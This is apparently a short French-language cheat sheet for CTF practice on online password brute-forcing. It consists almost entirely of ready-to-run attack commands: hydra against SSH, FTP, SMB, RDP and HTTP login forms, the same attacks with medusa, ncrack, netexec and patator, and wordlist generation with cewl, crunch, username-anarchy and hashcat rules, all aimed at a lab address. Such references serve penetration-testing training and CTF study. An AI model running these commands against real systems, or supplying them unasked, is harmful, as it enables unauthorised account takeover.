sommaire
Hydra (brute force en ligne)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
hydra -L users.txt -P rockyou.txt ftp://10.10.10.10
hydra -L users.txt -P pass.txt 10.10.10.10 smb
hydra -l administrator -P rockyou.txt rdp://10.10.10.10
hydra -l admin -P rockyou.txt 10.10.10.10 -s 8080 http-get /admin
Formulaire HTTP POST (le plus courant en CTF)
hydra -l admin -P rockyou.txt 10.10.10.10 http-post-form \
"/login.php:username=^USER^&password=^PASS^:F=incorrect"
# F=<texte present en cas d'ECHEC> (ou S=<texte de succes>)
Autres outils
medusa -h 10.10.10.10 -u admin -P rockyou.txt -M ssh
ncrack -p 3389 --user administrator -P rockyou.txt 10.10.10.10
netexec smb 10.10.10.10 -u users.txt -p pass.txt --continue-on-success
patator ssh_login host=10.10.10.10 user=admin password=FILE0 0=rockyou.txt
Génération de wordlists
cewl -d 2 -m 5 -w wl.txt http://10.10.10.10 # mots du site
crunch 6 8 -o wl.txt # combinaisons
username-anarchy -i noms.txt # formats de logins
hashcat --stdout -r rules/best64.rule rockyou.txt # muter une wordlist